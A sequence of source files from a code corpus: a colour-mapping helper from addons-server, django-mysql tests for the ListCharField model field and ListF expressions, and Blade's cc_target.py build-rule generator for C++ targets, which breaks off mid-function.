self.pattern_height = self.height
else:
self.pattern_height = svg_height
CHROME_COLOR_TO_CSS = {
'bookmark_text': 'toolbar_text',
'frame': 'accentcolor',
'frame_inactive': 'accentcolor',
'tab_background_text': 'textcolor',
}
def process_color_value(prop, value):
prop = CHROME_COLOR_TO_CSS.get(prop, prop)
if isinstance(value, list) and len(value) == 3:
return prop, u'rgb(%s,%s,%s)' % tuple(value)
# strip out spaces because jquery.minicolors chokes on them
return prop, unicode(value).replace(' ', '')
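# Illustrative results (not in the original): chrome-style property names map
# to their CSS equivalents and rgb triplets are serialized, e.g.
#     process_color_value('frame', [255, 99, 71])
#         -> ('accentcolor', u'rgb(255,99,71)')
#     process_color_value('toolbar_text', 'rgb(0, 0, 0)')
#         -> ('toolbar_text', u'rgb(0,0,0)')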
| atiqueahmedziad/addons-server | src/olympia/versions/utils.py | Python | bsd-3-clause | 4,124 |
import json
import re
import pytest
from django import forms
from django.core import exceptions, serializers
from django.core.management import call_command
from django.db import connection, models
from django.db.migrations.writer import MigrationWriter
from django.db.models import Q
from django.test import SimpleTestCase, TestCase, TransactionTestCase, override_settings
from django_mysql.forms import SimpleListField
from django_mysql.models import ListCharField, ListF
from django_mysql.test.utils import override_mysql_variables
from tests.testapp.models import (
CharListDefaultModel,
CharListModel,
IntListModel,
TemporaryModel,
)
class TestSaveLoad(TestCase):
def test_char_easy(self):
s = CharListModel.objects.create(field=["comfy", "big"])
assert s.field == ["comfy", "big"]
s = CharListModel.objects.get(id=s.id)
assert s.field == ["comfy", "big"]
s.field.append("round")
s.save()
assert s.field == ["comfy", "big", "round"]
s = CharListModel.objects.get(id=s.id)
assert s.field == ["comfy", "big", "round"]
def test_char_string_direct(self):
s = CharListModel.objects.create(field="big,bad")
s = CharListModel.objects.get(id=s.id)
assert s.field == ["big", "bad"]
def test_is_a_list_immediately(self):
s = CharListModel()
assert s.field == []
s.field.append("bold")
s.field.append("brave")
s.save()
assert s.field == ["bold", "brave"]
s = CharListModel.objects.get(id=s.id)
assert s.field == ["bold", "brave"]
def test_empty(self):
s = CharListModel.objects.create()
assert s.field == []
s = CharListModel.objects.get(id=s.id)
assert s.field == []
def test_char_cant_create_lists_with_empty_string(self):
with pytest.raises(ValueError):
CharListModel.objects.create(field=[""])
def test_char_cant_create_sets_with_commas(self):
with pytest.raises(ValueError):
CharListModel.objects.create(field=["co,mma", "contained"])
def test_char_basic_lookup(self):
mymodel = CharListModel.objects.create()
empty = CharListModel.objects.filter(field="")
assert empty.count() == 1
assert empty[0] == mymodel
mymodel.delete()
assert empty.count() == 0
def test_char_lookup_contains(self):
self.check_char_lookup("contains")
def test_char_lookup_icontains(self):
self.check_char_lookup("icontains")
def check_char_lookup(self, lookup):
lname = "field__" + lookup
mymodel = CharListModel.objects.create(field=["mouldy", "rotten"])
mouldy = CharListModel.objects.filter(**{lname: "mouldy"})
assert mouldy.count() == 1
assert mouldy[0] == mymodel
rotten = CharListModel.objects.filter(**{lname: "rotten"})
assert rotten.count() == 1
assert rotten[0] == mymodel
clean = CharListModel.objects.filter(**{lname: "clean"})
assert clean.count() == 0
with pytest.raises(ValueError):
list(CharListModel.objects.filter(**{lname: ["a", "b"]}))
both = CharListModel.objects.filter(
Q(**{lname: "mouldy"}) & Q(**{lname: "rotten"})
)
assert both.count() == 1
assert both[0] == mymodel
either = CharListModel.objects.filter(
Q(**{lname: "mouldy"}) | Q(**{lname: "clean"})
)
assert either.count() == 1
not_clean = CharListModel.objects.exclude(**{lname: "clean"})
assert not_clean.count() == 1
not_mouldy = CharListModel.objects.exclude(**{lname: "mouldy"})
assert not_mouldy.count() == 0
def test_char_len_lookup_empty(self):
mymodel = CharListModel.objects.create(field=[])
empty = CharListModel.objects.filter(field__len=0)
assert empty.count() == 1
assert empty[0] == mymodel
one = CharListModel.objects.filter(field__len=1)
assert one.count() == 0
one_or_more = CharListModel.objects.filter(field__len__gte=0)
assert one_or_more.count() == 1
def test_char_len_lookup(self):
mymodel = CharListModel.objects.create(field=["red", "expensive"])
empty = CharListModel.objects.filter(field__len=0)
assert empty.count() == 0
one_or_more = CharListModel.objects.filter(field__len__gte=1)
assert one_or_more.count() == 1
assert one_or_more[0] == mymodel
two = CharListModel.objects.filter(field__len=2)
assert two.count() == 1
assert two[0] == mymodel
three = CharListModel.objects.filter(field__len=3)
assert three.count() == 0
def test_char_default(self):
mymodel = CharListDefaultModel.objects.create()
assert mymodel.field == ["a", "d"]
mymodel = CharListDefaultModel.objects.get(id=mymodel.id)
assert mymodel.field == ["a", "d"]
def test_char_position_lookup(self):
mymodel = CharListModel.objects.create(field=["red", "blue"])
blue0 = CharListModel.objects.filter(field__0="blue")
assert blue0.count() == 0
red0 = CharListModel.objects.filter(field__0="red")
assert list(red0) == [mymodel]
red0_red1 = CharListModel.objects.filter(field__0="red", field__1="red")
assert red0_red1.count() == 0
red0_blue1 = CharListModel.objects.filter(field__0="red", field__1="blue")
assert list(red0_blue1) == [mymodel]
red0_or_blue0 = CharListModel.objects.filter(
Q(field__0="red") | Q(field__0="blue")
)
assert list(red0_or_blue0) == [mymodel]
def test_char_position_lookup_repeat_fails(self):
"""
FIND_IN_SET returns the *first* position so repeats are not dealt with
"""
CharListModel.objects.create(field=["red", "red", "blue"])
red1 = CharListModel.objects.filter(field__1="red")
assert list(red1) == [] # should be 'red'
def test_char_position_lookup_too_long(self):
CharListModel.objects.create(field=["red", "blue"])
red1 = CharListModel.objects.filter(field__2="blue")
assert list(red1) == []
def test_int_easy(self):
mymodel = IntListModel.objects.create(field=[1, 2])
assert mymodel.field == [1, 2]
mymodel = IntListModel.objects.get(id=mymodel.id)
assert mymodel.field == [1, 2]
def test_int_contains_lookup(self):
onetwo = IntListModel.objects.create(field=[1, 2])
ones = IntListModel.objects.filter(field__contains=1)
assert ones.count() == 1
assert ones[0] == onetwo
twos = IntListModel.objects.filter(field__contains=2)
assert twos.count() == 1
assert twos[0] == onetwo
threes = IntListModel.objects.filter(field__contains=3)
assert threes.count() == 0
with pytest.raises(ValueError):
list(IntListModel.objects.filter(field__contains=[1, 2]))
ones_and_twos = IntListModel.objects.filter(
Q(field__contains=1) & Q(field__contains=2)
)
assert ones_and_twos.count() == 1
assert ones_and_twos[0] == onetwo
ones_and_threes = IntListModel.objects.filter(
Q(field__contains=1) & Q(field__contains=3)
)
assert ones_and_threes.count() == 0
ones_or_threes = IntListModel.objects.filter(
Q(field__contains=1) | Q(field__contains=3)
)
assert ones_or_threes.count() == 1
no_three = IntListModel.objects.exclude(field__contains=3)
assert no_three.count() == 1
no_one = IntListModel.objects.exclude(field__contains=1)
assert no_one.count() == 0
def test_int_position_lookup(self):
onetwo = IntListModel.objects.create(field=[1, 2])
one0 = IntListModel.objects.filter(field__0=1)
assert list(one0) == [onetwo]
two0 = IntListModel.objects.filter(field__0=2)
assert two0.count() == 0
one0two1 = IntListModel.objects.filter(field__0=1, field__1=2)
assert list(one0two1) == [onetwo]
class TestListF(TestCase):
def test_append_to_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").append("first"))
model = CharListModel.objects.get()
assert model.field == ["first"]
def test_append_to_one(self):
CharListModel.objects.create(field=["big"])
CharListModel.objects.update(field=ListF("field").append("bad"))
model = CharListModel.objects.get()
assert model.field == ["big", "bad"]
def test_append_to_some(self):
CharListModel.objects.create(field=["big", "blue"])
CharListModel.objects.update(field=ListF("field").append("round"))
model = CharListModel.objects.get()
assert model.field == ["big", "blue", "round"]
def test_append_to_multiple_objects(self):
CharListModel.objects.create(field=["mouse"])
CharListModel.objects.create(field=["keyboard"])
CharListModel.objects.update(field=ListF("field").append("screen"))
first, second = tuple(CharListModel.objects.all())
assert first.field == ["mouse", "screen"]
assert second.field == ["keyboard", "screen"]
def test_append_exists(self):
CharListModel.objects.create(field=["nice"])
CharListModel.objects.update(field=ListF("field").append("nice"))
model = CharListModel.objects.get()
assert model.field == ["nice", "nice"]
@override_mysql_variables(SQL_MODE="ANSI")
def test_append_works_in_ansi_mode(self):
CharListModel.objects.create()
CharListModel.objects.update(field=ListF("field").append("big"))
CharListModel.objects.update(field=ListF("field").append("bad"))
model = CharListModel.objects.get()
assert model.field == ["big", "bad"]
def test_append_assignment(self):
model = CharListModel.objects.create(field=["red"])
model.field = ListF("field").append("blue")
model.save()
model = CharListModel.objects.get()
assert model.field == ["red", "blue"]
def test_appendleft_to_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").appendleft("first"))
model = CharListModel.objects.get()
assert model.field == ["first"]
def test_appendleft_to_one(self):
CharListModel.objects.create(field=["big"])
CharListModel.objects.update(field=ListF("field").appendleft("bad"))
model = CharListModel.objects.get()
assert model.field == ["bad", "big"]
def test_appendleft_to_some(self):
CharListModel.objects.create(field=["big", "blue"])
CharListModel.objects.update(field=ListF("field").appendleft("round"))
model = CharListModel.objects.get()
assert model.field == ["round", "big", "blue"]
def test_appendleft_to_multiple_objects(self):
CharListModel.objects.create(field=["mouse"])
CharListModel.objects.create(field=["keyboard"])
CharListModel.objects.update(field=ListF("field").appendleft("screen"))
first, second = tuple(CharListModel.objects.all())
assert first.field == ["screen", "mouse"]
assert second.field == ["screen", "keyboard"]
def test_appendleft_exists(self):
CharListModel.objects.create(field=["nice"])
CharListModel.objects.update(field=ListF("field").appendleft("nice"))
model = CharListModel.objects.get()
assert model.field == ["nice", "nice"]
@override_mysql_variables(SQL_MODE="ANSI")
def test_appendleft_works_in_ansi_mode(self):
CharListModel.objects.create()
CharListModel.objects.update(field=ListF("field").appendleft("big"))
CharListModel.objects.update(field=ListF("field").appendleft("bad"))
model = CharListModel.objects.get()
assert model.field == ["bad", "big"]
def test_appendleft_assignment(self):
model = CharListModel.objects.create(field=["red"])
model.field = ListF("field").appendleft("blue")
model.save()
model = CharListModel.objects.get()
assert model.field == ["blue", "red"]
def test_pop_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == []
def test_pop_one(self):
CharListModel.objects.create(field=["red"])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == []
def test_pop_two(self):
CharListModel.objects.create(field=["red", "blue"])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == ["red"]
def test_pop_three(self):
CharListModel.objects.create(field=["green", "yellow", "p"])
CharListModel.objects.update(field=ListF("field").pop())
model = CharListModel.objects.get()
assert model.field == ["green", "yellow"]
def test_popleft_none(self):
CharListModel.objects.create(field=[])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == []
def test_popleft_one(self):
CharListModel.objects.create(field=["red"])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == []
def test_popleft_two(self):
CharListModel.objects.create(field=["red", "blue"])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == ["blue"]
def test_popleft_three(self):
CharListModel.objects.create(field=["green", "yellow", "p"])
CharListModel.objects.update(field=ListF("field").popleft())
model = CharListModel.objects.get()
assert model.field == ["yellow", "p"]
class TestValidation(SimpleTestCase):
def test_max_length(self):
field = ListCharField(models.CharField(max_length=32), size=3, max_length=32)
field.clean({"a", "b", "c"}, None)
with pytest.raises(exceptions.ValidationError) as excinfo:
field.clean({"a", "b", "c", "d"}, None)
assert (
excinfo.value.messages[0]
== "List contains 4 items, it should contain no more than 3."
)
class TestCheck(SimpleTestCase):
def test_field_checks(self):
class InvalidListCharModel1(TemporaryModel):
field = ListCharField(models.CharField(), max_length=32)
errors = InvalidListCharModel1.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "django_mysql.E004"
assert "Base field for list has errors" in errors[0].msg
assert "max_length" in errors[0].msg
def test_invalid_base_fields(self):
class InvalidListCharModel2(TemporaryModel):
field = ListCharField(
models.ForeignKey("testapp.Author", on_delete=models.CASCADE),
max_length=32,
)
errors = InvalidListCharModel2.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "django_mysql.E005"
assert "Base field for list must be" in errors[0].msg
def test_max_length_including_base(self):
class InvalidListCharModel3(TemporaryModel):
field = ListCharField(
models.CharField(max_length=32), size=2, max_length=32
)
errors = InvalidListCharModel3.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "django_mysql.E006"
assert "Field can overrun" in errors[0].msg
def test_max_length_missing_doesnt_crash(self):
class InvalidListCharModel4(TemporaryModel):
field = ListCharField(models.CharField(max_length=2), size=2)
errors = InvalidListCharModel4.check(actually_check=True)
assert len(errors) == 1
assert errors[0].id == "fields.E120"
assert errors[0].msg == "CharFields must define a 'max_length' attribute."
class TestDeconstruct(TestCase):
def test_deconstruct(self):
field = ListCharField(models.IntegerField(), max_length=32)
name, path, args, kwargs = field.deconstruct()
new = ListCharField(*args, **kwargs)
assert new.base_field.__class__ == field.base_field.__class__
def test_deconstruct_with_size(self):
field = ListCharField(models.IntegerField(), size=3, max_length=32)
name, path, args, kwargs = field.deconstruct()
new = ListCharField(*args, **kwargs)
assert new.size == field.size
def test_deconstruct_args(self):
field = ListCharField(models.CharField(max_length=5), max_length=32)
name, path, args, kwargs = field.deconstruct()
new = ListCharField(*args, **kwargs)
assert new.base_field.max_length == field.base_field.max_length
class TestMigrationWriter(TestCase):
def test_makemigrations(self):
field = ListCharField(models.CharField(max_length=5), max_length=32)
statement, imports = MigrationWriter.serialize(field)
# The order of the output max_length/size statements varies by
# python version, hence a little regexp to match them
assert re.compile(
r"""^django_mysql\.models\.ListCharField\(
models\.CharField\(max_length=5\),\ # space here
(
max_length=32,\ size=None|
size=None,\ max_length=32
)
\)$
""",
re.VERBOSE,
).match(statement)
def test_makemigrations_with_size(self):
field = ListCharField(models.CharField(max_length=5), max_length=32, size=5)
statement, imports = MigrationWriter.serialize(field)
# The order of the output max_length/size statements varies by
# python version, hence a little regexp to match them
assert re.compile(
r"""^django_mysql\.models\.ListCharField\(
models\.CharField\(max_length=5\),\ # space here
(
max_length=32,\ size=5|
size=5,\ max_length=32
)
\)$
""",
re.VERBOSE,
).match(statement)
class TestMigrations(TransactionTestCase):
@override_settings(
MIGRATION_MODULES={"testapp": "tests.testapp.list_default_migrations"}
)
def test_adding_field_with_default(self):
table_name = "testapp_intlistdefaultmodel"
table_names = connection.introspection.table_names
with connection.cursor() as cursor:
assert table_name not in table_names(cursor)
call_command(
"migrate", "testapp", verbosity=0, skip_checks=True, interactive=False
)
with connection.cursor() as cursor:
assert table_name in table_names(cursor)
call_command(
"migrate",
"testapp",
"zero",
verbosity=0,
skip_checks=True,
interactive=False,
)
with connection.cursor() as cursor:
assert table_name not in table_names(cursor)
class TestSerialization(SimpleTestCase):
def test_dumping(self):
instance = CharListModel(field=["big", "comfy"])
data = json.loads(serializers.serialize("json", [instance]))[0]
field = data["fields"]["field"]
assert sorted(field.split(",")) == ["big", "comfy"]
def test_loading(self):
test_data = """
[{"fields": {"field": "big,leather,comfy"},
"model": "testapp.CharListModel", "pk": null}]
"""
objs = list(serializers.deserialize("json", test_data))
instance = objs[0].object
assert instance.field == ["big", "leather", "comfy"]
class TestDescription(SimpleTestCase):
def test_char(self):
field = ListCharField(models.CharField(max_length=5), max_length=32)
assert field.description == "List of String (up to %(max_length)s)"
def test_int(self):
field = ListCharField(models.IntegerField(), max_length=32)
assert field.description == "List of Integer"
class TestFormField(SimpleTestCase):
def test_model_field_formfield(self):
model_field = ListCharField(models.CharField(max_length=27))
form_field = model_field.formfield()
assert isinstance(form_field, SimpleListField)
assert isinstance(form_field.base_field, forms.CharField)
assert form_field.base_field.max_length == 27
def test_model_field_formfield_size(self):
model_field = ListCharField(models.IntegerField(), size=4)
form_field = model_field.formfield()
assert isinstance(form_field, SimpleListField)
assert form_field.max_length == 4
| arnau126/django-mysql | tests/testapp/test_listcharfield.py | Python | bsd-3-clause | 21,270 |
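A minimal pure-Python sketch of the FIND_IN_SET semantics that the position
lookups above rely on; it only models the SQL behaviour, and every name in it
is illustrative rather than part of django-mysql:

def find_in_set(value, stored):
    # MySQL FIND_IN_SET: 1-based position of the FIRST match, 0 if absent
    items = stored.split(",") if stored else []
    return items.index(value) + 1 if value in items else 0

def position_matches(stored, index, value):
    # field__<index>=value behaves like FIND_IN_SET(value, field) == index + 1
    return find_in_set(value, stored) == index + 1

assert position_matches("red,blue", 0, "red")
assert not position_matches("red,red,blue", 1, "red")  # first match wins, so repeats fail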
# Copyright (c) 2011 Tencent Inc.
# All rights reserved.
#
# Author: Michaelpeng <[email protected]>
# Date: October 20, 2011
"""
This is the cc_target module, which defines the base class
of all of the scons cc targets, like cc_library and cc_binary.
"""
import os
import subprocess
import Queue
import blade
import configparse
import console
import build_rules
from blade_util import var_to_list, stable_unique
from target import Target
class CcTarget(Target):
"""A scons cc target subclass.
    This class is derived from Target and it is the base class
of cc_library, cc_binary etc.
"""
def __init__(self,
name,
target_type,
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs):
"""Init method.
Init the cc target.
"""
srcs = var_to_list(srcs)
deps = var_to_list(deps)
defs = var_to_list(defs)
incs = var_to_list(incs)
export_incs = var_to_list(export_incs)
opt = var_to_list(optimize)
extra_cppflags = var_to_list(extra_cppflags)
extra_linkflags = var_to_list(extra_linkflags)
Target.__init__(self,
name,
target_type,
srcs,
deps,
visibility,
blade,
kwargs)
self.data['warning'] = warning
self.data['defs'] = defs
self.data['incs'] = incs
self.data['export_incs'] = export_incs
self.data['optimize'] = opt
self.data['extra_cppflags'] = extra_cppflags
self.data['extra_linkflags'] = extra_linkflags
self._check_defs()
self._check_incorrect_no_warning()
def _check_deprecated_deps(self):
"""Check whether it depends upon a deprecated library. """
for key in self.deps:
dep = self.target_database.get(key)
if dep and dep.data.get('deprecated'):
replaced_deps = dep.deps
if replaced_deps:
console.warning('%s: //%s has been deprecated, '
'please depends on //%s:%s' % (
self.fullname, dep.fullname,
replaced_deps[0][0], replaced_deps[0][1]))
def _prepare_to_generate_rule(self):
"""Should be overridden. """
self._check_deprecated_deps()
self._clone_env()
def _clone_env(self):
"""Select env. """
env_name = self._env_name()
warning = self.data.get('warning', '')
if warning == 'yes':
self._write_rule('%s = env_with_error.Clone()' % env_name)
else:
self._write_rule('%s = env_no_warning.Clone()' % env_name)
__cxx_keyword_list = frozenset([
'and', 'and_eq', 'alignas', 'alignof', 'asm', 'auto',
'bitand', 'bitor', 'bool', 'break', 'case', 'catch',
'char', 'char16_t', 'char32_t', 'class', 'compl', 'const',
'constexpr', 'const_cast', 'continue', 'decltype', 'default',
'delete', 'double', 'dynamic_cast', 'else', 'enum',
'explicit', 'export', 'extern', 'false', 'float', 'for',
'friend', 'goto', 'if', 'inline', 'int', 'long', 'mutable',
'namespace', 'new', 'noexcept', 'not', 'not_eq', 'nullptr',
'operator', 'or', 'or_eq', 'private', 'protected', 'public',
'register', 'reinterpret_cast', 'return', 'short', 'signed',
'sizeof', 'static', 'static_assert', 'static_cast', 'struct',
'switch', 'template', 'this', 'thread_local', 'throw',
'true', 'try', 'typedef', 'typeid', 'typename', 'union',
'unsigned', 'using', 'virtual', 'void', 'volatile', 'wchar_t',
'while', 'xor', 'xor_eq'])
def _check_defs(self):
"""_check_defs.
It will warn if user defines cpp keyword in defs list.
"""
defs_list = self.data.get('defs', [])
for macro in defs_list:
pos = macro.find('=')
if pos != -1:
macro = macro[0:pos]
if macro in CcTarget.__cxx_keyword_list:
console.warning('DO NOT define c++ keyword %s as macro' % macro)
def _check_incorrect_no_warning(self):
"""check if warning=no is correctly used or not. """
warning = self.data.get('warning', 'yes')
srcs = self.srcs
if not srcs or warning != 'no':
return
keywords_list = self.blade.get_sources_keyword_list()
for keyword in keywords_list:
if keyword in self.path:
return
illegal_path_list = []
for keyword in keywords_list:
            illegal_path_list += [s for s in srcs if keyword not in s]
if illegal_path_list:
console.warning("//%s:%s : warning='no' is only allowed "
"for code in thirdparty." % (
self.key[0], self.key[1]))
def _objs_name(self):
"""_objs_name.
Concatenating target path, target name to be objs var and returns.
"""
return 'objs_%s' % self._generate_variable_name(self.path, self.name)
def _prebuilt_cc_library_path(self, prefer_dynamic=False):
"""
Return source and target path of the prebuilt cc library.
When both .so and .a exist, return .so if prefer_dynamic is True.
Otherwise return the existing one.
"""
a_src_path = self._prebuilt_cc_library_pathname(dynamic=False)
so_src_path = self._prebuilt_cc_library_pathname(dynamic=True)
libs = (a_src_path, so_src_path) # Ordered by priority
if prefer_dynamic:
libs = (so_src_path, a_src_path)
source = ''
for lib in libs:
if os.path.exists(lib):
source = lib
break
if not source:
console.error_exit('%s: Can not find either %s or %s' % (
self.fullname, libs[0], libs[1]))
target = self._target_file_path(os.path.basename(source))
return source, target
def _prebuilt_cc_library_pathname(self, dynamic=False):
options = self.blade.get_options()
suffix = 'a'
if dynamic:
suffix = 'so'
return os.path.join(self.path, 'lib%s_%s' % (options.m, options.profile),
'lib%s.%s' % (self.name, suffix))
def _prebuilt_cc_library_dynamic_soname(self, so):
"""Get the soname of prebuilt shared library. """
soname = None
output = subprocess.check_output('objdump -p %s' % so, shell=True)
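        # A typical matching line in the objdump output (name hypothetical):
        #   SONAME               libfoo.so.1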
for line in output.splitlines():
parts = line.split()
if len(parts) == 2 and parts[0] == 'SONAME':
soname = parts[1]
break
return soname
def _setup_cc_flags(self):
"""_setup_cc_flags. """
env_name = self._env_name()
flags_from_option, incs_list = self._get_cc_flags()
if flags_from_option:
self._write_rule('%s.Append(CPPFLAGS=%s)' % (env_name, flags_from_option))
if incs_list:
self._write_rule('%s.Append(CPPPATH=%s)' % (env_name, incs_list))
def _setup_as_flags(self):
"""_setup_as_flags. """
env_name = self._env_name()
as_flags, aspp_flags = self._get_as_flags()
if as_flags:
self._write_rule('%s.Append(ASFLAGS=%s)' % (env_name, as_flags))
if aspp_flags:
self._write_rule('%s.Append(ASPPFLAGS=%s)' % (env_name, aspp_flags))
def _setup_link_flags(self):
"""linkflags. """
extra_linkflags = self.data.get('extra_linkflags')
if extra_linkflags:
self._write_rule('%s.Append(LINKFLAGS=%s)' % (self._env_name(), extra_linkflags))
def _get_optimize_flags(self):
"""get optimize flags such as -O2"""
oflags = []
opt_list = self.data.get('optimize')
if not opt_list:
cc_config = configparse.blade_config.get_config('cc_config')
opt_list = cc_config['optimize']
if opt_list:
for flag in opt_list:
if flag.startswith('-'):
oflags.append(flag)
else:
oflags.append('-' + flag)
else:
oflags = ['-O2']
return oflags
def _get_cc_flags(self):
"""_get_cc_flags.
Return the cpp flags according to the BUILD file and other configs.
"""
cpp_flags = []
# Warnings
if self.data.get('warning', '') == 'no':
cpp_flags.append('-w')
# Defs
defs = self.data.get('defs', [])
cpp_flags += [('-D' + macro) for macro in defs]
# Optimize flags
if (self.blade.get_options().profile == 'release' or
self.data.get('always_optimize')):
cpp_flags += self._get_optimize_flags()
# Add -fno-omit-frame-pointer to optimize mode for easy debugging.
cpp_flags += ['-fno-omit-frame-pointer']
cpp_flags += self.data.get('extra_cppflags', [])
# Incs
incs = self.data.get('incs', []) + self.data.get('export_incs', [])
incs = [os.path.normpath(os.path.join(self.path, inc)) for inc in incs]
incs += self._export_incs_list()
# Remove duplicate items in incs list and keep the order
incs = stable_unique(incs)
return (cpp_flags, incs)
def _get_as_flags(self):
"""_get_as_flags.
Return the as flags according to the build architecture.
"""
options = self.blade.get_options()
as_flags = ['-g', '--' + options.m]
aspp_flags = ['-Wa,--' + options.m]
return as_flags, aspp_flags
def _export_incs_list(self):
"""_export_incs_list.
        Collect the export_incs paths from all dependency targets.
"""
deps = self.expanded_deps
inc_list = []
for lib in deps:
# system lib
if lib[0] == '#':
continue
target = self.target_database[lib]
for inc in target.data.get('export_incs', []):
path = os.path.normpath(os.path.join(target.path, inc))
inc_list.append(path)
return inc_list
def _static_deps_list(self):
"""_static_deps_list.
Returns
-----------
link_all_symbols_lib_list: the libs to link all its symbols into target
lib_list: the libs list to be statically linked into static library
Description
-----------
It will find the libs needed to be linked into the target statically.
"""
build_targets = self.blade.get_build_targets()
lib_list = []
link_all_symbols_lib_list = []
for dep in self.expanded_deps:
dep_target = build_targets[dep]
if dep_target.type == 'cc_library' and not dep_target.srcs:
continue
# system lib
if dep_target.type == 'system_library':
lib_name = "'%s'" % dep_target.name
else:
lib_name = dep_target.data.get('static_cc_library_var')
if lib_name:
if dep_target.data.get('link_all_symbols'):
link_all_symbols_lib_list.append(lib_name)
else:
lib_list.append(lib_name)
return (link_all_symbols_lib_list, lib_list)
def _dynamic_deps_list(self):
"""_dynamic_deps_list.
Returns
-----------
lib_list: the libs list to be dynamically linked into dynamic library
Description
-----------
It will find the libs needed to be linked into the target dynamically.
"""
build_targets = self.blade.get_build_targets()
lib_list = []
for lib in self.expanded_deps:
dep_target = build_targets[lib]
if (dep_target.type == 'cc_library' and
not dep_target.srcs):
continue
# system lib
if lib[0] == '#':
lib_name = "'%s'" % lib[1]
else:
lib_name = dep_target.data.get('dynamic_cc_library_var')
if lib_name:
lib_list.append(lib_name)
return lib_list
def _get_static_deps_lib_list(self):
"""Returns a tuple that needed to write static deps rules. """
(link_all_symbols_lib_list, lib_list) = self._static_deps_list()
lib_str = 'LIBS=[%s]' % ','.join(lib_list)
whole_link_flags = []
if link_all_symbols_lib_list:
whole_link_flags = ['"-Wl,--whole-archive"']
for i in link_all_symbols_lib_list:
whole_link_flags.append(i)
whole_link_flags.append('"-Wl,--no-whole-archive"')
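            # Resulting flags take the shape (library names hypothetical):
            #   -Wl,--whole-archive libwhole.a -Wl,--no-whole-archive
            # which forces every object of those archives into the link.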
return (link_all_symbols_lib_list, lib_str, ', '.join(whole_link_flags))
def _get_dynamic_deps_lib_list(self):
"""Returns the libs string. """
lib_list = self._dynamic_deps_list()
return 'LIBS=[%s]' % ','.join(lib_list)
def _prebuilt_cc_library_is_depended(self):
build_targets = self.blade.get_build_targets()
for key in build_targets:
target = build_targets[key]
if (self.key in target.expanded_deps and
target.type != 'prebuilt_cc_library'):
return True
return False
def _prebuilt_cc_library_rules(self, var_name, target, source):
"""Generate scons rules for prebuilt cc library. """
if source.endswith('.a'):
self._write_rule('%s = top_env.File("%s")' % (var_name, source))
else:
self._write_rule('%s = top_env.Command("%s", "%s", '
'Copy("$TARGET", "$SOURCE"))' % (
var_name, target, source))
def _prebuilt_cc_library(self):
"""Prebuilt cc library rules. """
        # We allow a prebuilt cc_library to be missing if it is not used.
        # So if no target depends on this library, don't generate any rule,
        # which avoids runtime errors and unnecessary runtime cost.
if not self._prebuilt_cc_library_is_depended():
return
        # Paths used for static linking; note the file may actually be a dynamic library!
static_src_path, static_target_path = self._prebuilt_cc_library_path()
var_name = self._var_name()
self._prebuilt_cc_library_rules(var_name, static_target_path, static_src_path)
self.data['static_cc_library_var'] = var_name
dynamic_src_path, dynamic_target_path = '', ''
if self._need_dynamic_library():
dynamic_src_path, dynamic_target_path = self._prebuilt_cc_library_path(
prefer_dynamic=True)
            # Avoid copying twice if there is only one kind of library
if dynamic_target_path != static_target_path:
var_name = self._var_name('dynamic')
self._prebuilt_cc_library_rules(var_name,
dynamic_target_path,
dynamic_src_path)
self.data['dynamic_cc_library_var'] = var_name
        # Make a symbolic link if either library is a shared object (.so)
self.file_and_link = None
so_src, so_target = '', ''
if static_target_path.endswith('.so'):
so_src = static_src_path
so_target = static_target_path
elif dynamic_target_path.endswith('.so'):
so_src = dynamic_src_path
so_target = dynamic_target_path
if so_src:
soname = self._prebuilt_cc_library_dynamic_soname(so_src)
if soname:
self.file_and_link = (so_target, soname)
def _static_cc_library(self):
"""_cc_library.
It will output the cc_library rule into the buffer.
"""
env_name = self._env_name()
var_name = self._var_name()
self._write_rule('%s = %s.Library("%s", %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name()))
self.data['static_cc_library_var'] = var_name
self._add_default_target_var('a', var_name)
def _dynamic_cc_library(self):
"""_dynamic_cc_library.
It will output the dynamic_cc_library rule into the buffer.
"""
self._setup_link_flags()
var_name = self._var_name('dynamic')
env_name = self._env_name()
lib_str = self._get_dynamic_deps_lib_list()
if self.srcs or self.expanded_deps:
if not self.data.get('allow_undefined'):
self._write_rule('%s.Append(LINKFLAGS=["-Xlinker", "--no-undefined"])'
% env_name)
self._write_rule('%s = %s.SharedLibrary("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self.data['dynamic_cc_library_var'] = var_name
self._add_target_var('so', var_name)
def _need_dynamic_library(self):
options = self.blade.get_options()
config = configparse.blade_config.get_config('cc_library_config')
return (getattr(options, 'generate_dynamic') or
self.data.get('build_dynamic') or
config.get('generate_dynamic'))
def _cc_library(self):
self._static_cc_library()
if self._need_dynamic_library():
self._dynamic_cc_library()
def _generate_generated_header_files_depends(self, var_name):
"""Generate dependencies to targets that generate header files. """
env_name = self._env_name()
q = Queue.Queue(0)
for key in self.deps:
q.put(key)
keys = set()
while not q.empty():
key = q.get()
if key not in keys:
keys.add(key)
dep = self.target_database[key]
if dep._generate_header_files():
if dep.srcs:
self._write_rule('%s.Depends(%s, %s)' % (
env_name, var_name, dep._var_name()))
else:
for k in dep.deps:
q.put(k)
def _cc_objects_rules(self):
"""_cc_objects_rules.
Generate the cc objects rules for the srcs in srcs list.
"""
target_types = ['cc_library',
'cc_binary',
'cc_test',
'cc_plugin']
        if self.type not in target_types:
console.error_exit('logic error, type %s err in object rule' % self.type)
objs_name = self._objs_name()
env_name = self._env_name()
self._setup_cc_flags()
objs = []
for src in self.srcs:
obj = '%s_%s_object' % (self._var_name_of(src),
self._regular_variable_name(self.name))
target_path = self._target_file_path() + '.objs/%s' % src
source_path = self._target_file_path(src) # Also find generated files
